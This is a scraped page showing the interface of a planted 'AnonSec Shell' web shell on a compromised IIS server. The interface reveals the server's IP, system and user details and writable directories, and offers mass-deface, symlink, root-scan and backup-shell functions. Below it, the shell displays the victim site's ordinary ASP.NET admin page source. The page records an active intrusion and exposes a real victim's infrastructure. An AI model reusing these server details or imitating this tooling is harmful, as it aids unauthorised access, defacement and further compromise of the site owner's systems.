. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 87.98.249.37  /  Your IP : 216.73.216.208   [ Reverse IP ]
Web Server : Microsoft-IIS/10.0
System : Windows NT NS3076740 10.0 build 17763 (Windows Server 2019) AMD64
User : IWPD_292(growel19p) ( 0)
PHP Version : 8.3.12
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/growel.com/httpdocs/GrowelAdmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : C:/Inetpub/vhosts/growel.com/httpdocs/GrowelAdmin///Pages.aspx
<%@ Page Title="" Language="C#" MasterPageFile="~/GrowelAdmin/Admin.Master" AutoEventWireup="true" CodeBehind="Pages.aspx.cs" Inherits="GrowelWeb.GrowelAdmin.Pages" %>
<asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server">
    <script>
        $(function () {


            $("#sortable").sortable();
            $("#sortable").disableSelection();

            $("#order").click(function () {

                saveOrder();


            });



        });

        function saveOrder() {

            $("#stat").fadeIn(100);
            $("#stat").html("Please wait");

            var selectedLanguage = new Array();
            $('#sortable .sort').each(function () {
                selectedLanguage.push($(this).attr("title"));
            });

            var bt = $('#<%=ddlsections.ClientID %>').val();
            alert(bt);
            alert(selectedLanguage);
            $.ajax({
                url: 'sortpages.aspx?pages=' + selectedLanguage + '&p=' + bt,
                dataType: "html",
                type: 'POST', //I want a type as POST
                data: "pages=" + selectedLanguage + "&p=" + bt,

                success: function (data) {
                    //$("#stat").html(data);
                    //  alert("New Order is saved.")
                    $("#stat").html("New Order is saved.");
                    //location.reload();
                }
            });

        }
    </script>



</asp:Content>
<asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server">


    <h3>Pages Manager</h3>
    
   <div class="btn-danger status" visible="false" runat="server" id="status"></div>
 
    <div class="topbutton">
        <asp:Button ID="btnaddpage" runat="server" Text="Add New Page"  CssClass="btn btn-default" OnClick="btnaddpage_Click" />
    </div>

<table cellspacing="0" cellpadding="4" border="0" class="form" width="90%">
<tr>
  <td>Select Section
      <asp:DropDownList ID="ddlsections" runat="server" CssClass="form-control form-inline">
      </asp:DropDownList> 
    </td><td><br /><asp:Button ID="btnsubmit" runat="server" Text="Display" OnClick="btnsubmit_Click" CssClass="btn btn-info" /></td>
</tr>
</table>

    <div id="sortable">
      <asp:Repeater ID="gdvpages" runat="server">
          <ItemTemplate>
              <div class="col-md-3 sort" title='<%#Eval("page") %>'>
                  <div class="thumb">
                  <div><b><%#Eval("page_displaytitle") %></b></div>
                   <div><a href='EditPage.aspx?page=<%#Eval("page") %>'>Edit Page</a> <asp:LinkButton ID="lnkdelete" OnCommand="lnkdelete_click"  runat="server" OnClientClick="return confirm('Delete page? All Page Data Will Be Lost')" Text="Delete" CommandArgument='<%#Eval("page") %>'></asp:LinkButton> <a href='ManageSubpages.aspx?page=<%#Eval("page") %>'>Manage Subpages</a></div>
              </div>
          </div>
          </ItemTemplate>
      </asp:Repeater>
        </div>
    <br clear="all" />
    <div class="btn btn-default" id="order">Save order</div>
        <div class="clearfix" style="padding:10px;font-weight:bold;" id="stat"></div>
</asp:Content>

Anon7 - 2022
AnonSec Team